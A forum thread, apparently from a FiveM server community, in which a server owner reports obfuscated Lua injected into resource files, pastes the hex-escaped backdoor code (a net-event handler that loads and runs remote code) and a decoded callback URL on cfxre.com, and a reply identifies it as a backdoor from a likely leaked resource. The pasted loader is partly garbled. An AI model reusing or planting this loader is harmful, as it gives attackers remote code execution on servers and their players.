Screenshot-basic BACKDOOR

when i run screenshot-basic it inject some code in random file and when decoded its a cfxre.com url

./server-data/afterlifev4/txData/CFXDefault_928DAD.base/resources/[qs]/[smartphone]/qs-smartphone/config/config_uber.lua:local OMBrqKfTPblmDAxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} OMBrqKfTPblmDAwVxIMXAONxVlxFoaICmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[1] OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6][OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrAebAdQjqpUwbeLnYshnS[3]](OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[2], function(wYAzlvEkhgSLEgEYhlaMxHwKJUipUEtrEVvXVJuEYUDBQDPfsFjiMKkMjH) OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANbAdQjqpUwbeLnYshnS[4]() end)
Binary file ./server-data/afterlifev4/txData/CFXDefault_928DAD.base/resources/[qs]/qs-core/server/functions.lua matches
./server/alpine/opt/cfx-server/citizen/system_resources/monitor/resource/menu/vendor/freecam/config.lua:local OMBrqKfTPblmDAwVxIMXAONxVlxFoaICmrcUeTZebAdQjqpUwbeLnYshnS = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\x64\x65”,“\x41\x66\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[1] OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6][OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQnS[3]](OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[2], function(wYAzlvEkhgSLEgEYhlaMxHwKJUipUEtrEJiefDzHgFzgMVvXVJjiMKkMjH) OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjS[4]() end)

the url decoded : https://cfxre.com/v2_/stage3b.php?asf=MlIrVFIvVWx6R3J0N1Vod2pGTi9jSzgxbnlYZlYrdm5PTlBJK1Nrd0NJODBiZ3hTTnpsSUhPcDJMWUVKRTdqdA==

It appears you probably got your server infected with a stolen/leaked resource that has a backdoor in it. That is not normal behavior, and I have qs-smartphone as well, and it doesn’t do those things.

Also, cfxre.com is not a fivem domain to my knowledge. As it would be either cfx.re or fivem.net

its weird because when i delete screenshot-basic it dont spread anywhere

and when i redownload the version from citizenfx it spread again

i never use leaked resource i always buy them trought tebex store btw is it possible that one of them had a backdoor ?